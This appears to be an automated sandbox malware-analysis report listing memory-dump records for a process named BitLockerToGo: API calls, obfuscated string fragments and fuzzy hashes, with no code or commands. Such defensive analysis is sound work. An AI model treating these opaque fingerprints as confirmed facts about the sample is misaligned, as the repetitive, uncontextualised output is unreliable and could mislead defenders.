                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: .L6h$>:6"$HP@^$lokz$#v
                                                                                                                                                                                                                                                  • API String ID: 0-2201430921
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 344208780-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Clipboard$CloseDataLongOpenWindow
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1647500905-0
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 0$0$0$@$i
                                                                                                                                                                                                                                                  • API String ID: 0-3124195287
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 4`[b$4`[b$\$_^]\$_P
                                                                                                                                                                                                                                                  • API String ID: 0-1724557354
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: ntpr$p$rM$uw$~
                                                                                                                                                                                                                                                  • API String ID: 0-317133307
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: %Y$4`[b$_^]\$_^]\
                                                                                                                                                                                                                                                  • API String ID: 0-3285931464
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID: _^]\$avub$x${'~s
                                                                                                                                                                                                                                                  • API String ID: 2994545307-3044202774
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: &@>U$QZSy$U'Y.
                                                                                                                                                                                                                                                  • API String ID: 0-909587503
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 4`[b$<="#$_^]\
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 45$\]$}z
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 4`[b$4`[b$_^]\
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: _^]\$f
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: Inf$NaN
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 0$
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 0$
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 0$
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(0044EB80,00000000,00000001,0044EB70), ref: 00425D49
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateInstance
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 542301482-0
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: _^]\
                                                                                                                                                                                                                                                  • API String ID: 0-3116432788
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 0$
                                                                                                                                                                                                                                                  • API String ID: 0-900979605
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: sp
                                                                                                                                                                                                                                                  • API String ID: 0-2933045414
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: P
                                                                                                                                                                                                                                                  • API String ID: 0-3110715001
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: =
                                                                                                                                                                                                                                                  • API String ID: 0-193990712
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: _^]\
                                                                                                                                                                                                                                                  • API String ID: 0-3116432788
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 4;:y
                                                                                                                                                                                                                                                  • API String ID: 0-2051255674
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 4`[b
                                                                                                                                                                                                                                                  • API String ID: 0-3962175265
                                                                                                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: _^]\
                                                                                                                                                                                                                                                  • API String ID: 0-3116432788
                                                                                                                                                                                                                                                  • Opcode ID: 07a3029c9f2c1e474468fab06dc3aed8a4433feabc96eb799fd61ed9ee838327
                                                                                                                                                                                                                                                  • Instruction ID: 0635231909715c318ffdadaee8fc8a63bd4bc7359a691521a8f6f89ce1d81991
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07a3029c9f2c1e474468fab06dc3aed8a4433feabc96eb799fd61ed9ee838327
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6851B0746092409BE714DB55E980B2BB7E6EFC5704F19882EE8C987352D739EC10CB6A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: $%
                                                                                                                                                                                                                                                  • API String ID: 0-4214564638
                                                                                                                                                                                                                                                  • Opcode ID: 66a02fc15c09f8371ce107ca58ced43fe82fa44e3e165eba7ea05b002aaa382e
                                                                                                                                                                                                                                                  • Instruction ID: ec1bccfda47f7595bee8eb1b737ffa0cc694392b6672ac4e172fe49f4c450ab1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66a02fc15c09f8371ce107ca58ced43fe82fa44e3e165eba7ea05b002aaa382e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2731CCB05083109BC710DF18D491A2BBBF1FF96358F449A0DE4D95B3A2E379E940CB9A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: >:6"
                                                                                                                                                                                                                                                  • API String ID: 0-1144053849
                                                                                                                                                                                                                                                  • Opcode ID: 4976777060d6235f4b9add8f3674b6d11bbb935eab5f010cbfc7afa09bd17a64
                                                                                                                                                                                                                                                  • Instruction ID: 33178f4afd00e9099759b984be3ac119d6afb0704ddaa93e413734017d0e7d40
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4976777060d6235f4b9add8f3674b6d11bbb935eab5f010cbfc7afa09bd17a64
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64317E70504B818AD3258F3585607F7FFF0AF2B306F54298ED4EA9B293D339A5058B18
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                  • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                                  • Opcode ID: 0651963b11ec495fbef1a023fe6f234247c030a22bb24d56be10e3a9af831a44
                                                                                                                                                                                                                                                  • Instruction ID: 5815b61cf46c545785f8eb0cfc01d82d55d1a866a37f2d059873a76f9c7c5db7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0651963b11ec495fbef1a023fe6f234247c030a22bb24d56be10e3a9af831a44
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B3158705093009BE714DF15D880A2BBBF5FF8A318F14992DE9C897352D339D9048BAA
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: df6301ece2f696f048da671d6c4a615d9af494cd0d3e0bd17f31d7bfe1971ca5
                                                                                                                                                                                                                                                  • Instruction ID: 10ca3236c8b0209530b435292193d8e84d69ecfe6dd6fcf3182e2ade1c05c7e6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df6301ece2f696f048da671d6c4a615d9af494cd0d3e0bd17f31d7bfe1971ca5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5B18AB4500B009BD3219F25C980B57FBF1EF46B05F04891EE8AA97B52E339F954CB98
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ed1cdb187d5679581427f5513c755a17fba32a4836aa2768c937e221ba319891
                                                                                                                                                                                                                                                  • Instruction ID: 77dc9a6f90af4d51df16105db384998fe7444c995f7724d6f2eb4fea05ae5f94
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed1cdb187d5679581427f5513c755a17fba32a4836aa2768c937e221ba319891
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39B17DB0600B009FD735CF24C580B67B7F6AF86315F14891ED4AA87A51E778F885CB98
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 27ced31cc5a99183f576a7ce7ac932445af75c7cbb28ab667b14b565cbfb8514
                                                                                                                                                                                                                                                  • Instruction ID: c93bb3055daa1e89e1beb99f5478b3f90827c8e15d0747c282fac1d1b3b418d5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27ced31cc5a99183f576a7ce7ac932445af75c7cbb28ab667b14b565cbfb8514
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07C15874500B40DBD3218F25C980BA7BBF5EF86705F44891EE8AA97B51E339F854CB68
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 0aaf816ecffecd358245f2a9767a204afc7590f17c35775b7bb6b53be753c2a9
                                                                                                                                                                                                                                                  • Instruction ID: abdc3f194c51dfd8672bdfe5dc8b0ca5f49385bfdfad6ad40c24e6642a31a7a7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0aaf816ecffecd358245f2a9767a204afc7590f17c35775b7bb6b53be753c2a9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37A17B74500B40DBD3219F24C985BA7BBF5EF86704F44881EE4AA97B52D339F854CBA8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                  • Instruction ID: 2d20becdcac22a936684325d3bb42f08e8b23f6142ca72106b4160fbd8ce1334
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3115933A041D40EC3128D3C8400665FFA34AE7234F58439AF4B49B2D6CB2A9D8A8398
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 6fec54a99f9fbac47ce9e4549ff29fa63aa55858868289cb6989d8ecc1896df1
                                                                                                                                                                                                                                                  • Instruction ID: 93977dfb57e4194a6656e5daef84cb97a035edd253edcf9bc1b60b2c8519fbf9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6fec54a99f9fbac47ce9e4549ff29fa63aa55858868289cb6989d8ecc1896df1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1121B4F0904B00AFD364EF3AC946757BEE8FB49350F508A1EF4AA87690D371A5448BD6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: cd5b8c032f38892569d862603859582475589757443902fd26e89881274df44e
                                                                                                                                                                                                                                                  • Instruction ID: bb6a9f11dec9aaabc402874fd6fe767739662e7c3dc4b3ebc9a4df7e229ca194
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd5b8c032f38892569d862603859582475589757443902fd26e89881274df44e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E0192B170031197DA20DF55E4D1B37B6B86F90708F98413ED80A97342DBB9EC09C6A9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: bcb308c04c1f3215ed22ce86bfc9f8a4beb430ab0e49f7044f6ca3dc80d82e34
                                                                                                                                                                                                                                                  • Instruction ID: e6df7435b35dc03ef046c6d937846b96e26642c71c60abef5850cb5f7e7a4fe8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bcb308c04c1f3215ed22ce86bfc9f8a4beb430ab0e49f7044f6ca3dc80d82e34
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08F0A7B1A0415057DB22C9559C81BB7BB9CCF8B3A4F190417E84557202E1795CD8C3EE
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                                                                                                                                                  • Instruction ID: 70fd4d8660649c4cc1aee28f4a9409345eae8d093d65b6a5c03d063ad3adfc1f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBD05B2150822146BB648E29A500577F7F0EA87711B85555FFA86E3244D234DC41D16D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 9385e8aa8fd41dfacdd9aae494201ea6d279f7af78fecc39e2f0176506ad951f
                                                                                                                                                                                                                                                  • Instruction ID: 86644001eb4e0fafcc888b4b38741f7d4c4b97b8ecc491a716586d559c45a34b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9385e8aa8fd41dfacdd9aae494201ea6d279f7af78fecc39e2f0176506ad951f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10B092A5D00004C6D811BB113D8253BB0341553749F04223AE80772243B6AAD11A68BF
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: AllocString
• String ID: &$*$0$1$3$9$9$9$;$=$?$?$A$B$C$C$E$G$I$I$K$M$M$O$O$Q$S$U$W$Y$[$]$_$`$a$a$c$c$d$e$f$g$h$i$j$k$l$m$n$o$q$s$s$u$w${$}$~
• API String ID: 2525500382-3639167494
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: AllocString
• String ID: !$$$%$&$)$.$/$/$0$P$T$X$i$k$m$o$q$s$u$w$y${$}
• API String ID: 2525500382-880222569
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: AllocString
• String ID: !$$$%$&$)$.$/$/$0$P$T$X$i$k$m$o$q$s$u$w$y${$}
• API String ID: 2525500382-880222569
Similarity
• API ID: Variant$ClearInit
• String ID: !$$$&$,$1$1$3$3$3$5$7$9$9$<$@
• API String ID: 2610073882-1861331566
Similarity
• API ID: Variant$ClearInit
• String ID: !$#$%$'$1$3$5$6$7$9$;$=$?$y$z
• API String ID: 2610073882-4166476733
Similarity
• API ID: Variant$ClearInit
• String ID: `$b$k$o$w$y$}$~
• API String ID: 2610073882-2332359574
Similarity
• API ID: InitVariant
• String ID: A$C$E$G$I$K
• API String ID: 1927566239-2163534136
Similarity
• API ID: InitVariant
• String ID: A$C$E$G$I$K
• API String ID: 1927566239-2163534136